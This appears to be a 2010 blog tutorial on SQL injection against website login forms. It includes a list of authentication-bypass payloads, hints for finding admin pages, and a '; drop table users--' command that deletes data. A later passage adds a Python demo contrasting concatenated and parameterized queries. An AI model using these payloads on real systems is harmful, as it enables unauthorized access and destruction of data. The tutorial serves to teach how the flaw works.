Sunday, October 3, 2010

SQL Injection - Login form

A SQL injection attack consists of inserting, or "injecting", SQL code via the input data sent from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administrative operations on the database (such as shutting down the DBMS), recover the content of a given file on the DBMS file system and, in some cases, issue commands to the operating system.

The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed and is therefore unexpectedly executed as part of the query.

There are two SQL injection attack types:

- Error Based Injections
- Blind Injection Attacks

But first of all you need to find a SQL bug. The easiest and fastest way to get SQL code into a database is through a form. If you want superuser privileges on a system, all you need to do is bypass the authentication check, and you can do this through the login form of a website. Login forms are usually found at URLs like the following. For example:
www.victim.com/admin
www.victim.com/administrator
www.victim.com/login
www.victim.com/login.asp
www.victim.com/admin/admin.php .... etc 
Be creative. :)

Login page SQL query - How it works
The simplest way for a login page to work is by building a database query that looks like this:
SELECT id FROM users WHERE username = '$user'
AND password = '$pass'

In a normal login, when the user inputs the username 'Admin' and the password '1234', the query looks like this:

SELECT id FROM users WHERE username = 'Admin'
AND password = '1234'
 

If the variables $user and $pass are taken directly from the user's input, this can easily be compromised. Suppose that we give 'Admin' as the username and the string something' or 'a'='a as the password. The query will look like this:
SELECT id FROM users WHERE username = 'Admin'
AND password = 'something' OR 'a'='a'

Because 'a'='a' is always true, this lets you bypass authentication and gives you superuser privileges without knowing the password. If you type the query into the username field, you need to add "--" or "/*" at the end of it. "--" and "/*" are comment markers, so the rest of the query after these characters is ignored (note that on MySQL "--" must be followed by a space). You can also try other SQL statements in the username or password fields:
' or 1=1
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

You can also try many variations in username, password or both fields.
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
or 1=1--
1' or 1=1 --
a' or 'a'='a
a') or ('a'='a
a") or ("a"="a 

For example, you can try a more advanced query such as '; drop table users-- in the username field. If the database and its driver accept several statements in one call (stacked queries), the 'users' table will be deleted. The '--' character sequence is the comment marker, and the ';' character denotes the end of one query and the beginning of another. The '--' at the end of the username field is required in order for this particular query to terminate without a syntax error.

SELECT id FROM users WHERE username = ''; drop table users--' AND password = '1234'
                                                             ^ everything from -- onwards is a comment
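To make the mechanism concrete, here is an added example (not code from the original post) that builds the $user/$pass query above in two ways against a constructed in-memory SQLite table: once by string concatenation, as the post describes, and once with bound parameters, which is the fix. Table layout and the 'Admin'/'1234' row are assumed for the demo.

```python
import sqlite3


def make_db():
    """Constructed in-memory 'users' table standing in for a real login database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('Admin', '1234')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    """Builds the query by string interpolation, exactly like the $user/$pass example.
    Whatever the user types becomes part of the SQL text."""
    query = f"SELECT id FROM users WHERE username = '{user}' AND password = '{password}'"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, user, password):
    """Same query, but the values are bound as parameters: the driver sends them
    as data, so quotes and comment markers inside them never alter the SQL."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (user, password)).fetchone()
    return row[0] if row else None


def demo():
    """Runs the post's inputs through both versions and returns the user id found (or None)."""
    conn = make_db()
    bypass_pw = "something' OR 'a'='a"   # the password from the post
    comment_user = "Admin'--"            # the admin'-- username variant from the post
    return {
        "normal_vuln": login_vulnerable(conn, "Admin", "1234"),
        "normal_safe": login_parameterized(conn, "Admin", "1234"),
        "bypass_vuln": login_vulnerable(conn, "Admin", bypass_pw),
        "bypass_safe": login_parameterized(conn, "Admin", bypass_pw),
        "comment_vuln": login_vulnerable(conn, comment_user, "wrong"),
        "comment_safe": login_parameterized(conn, comment_user, "wrong"),
    }


if __name__ == "__main__":
    for case, user_id in demo().items():
        print(f"{case}: {'login OK (id %s)' % user_id if user_id else 'rejected'}")
```

The concatenated version accepts both injected inputs without the real password; the parameterized version rejects them because the injected text is compared as a literal string, not parsed as SQL.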

I hope that I have explained the basics about SQL injection attacks on login forms. Next time I will explain "Error Based SQL Injections".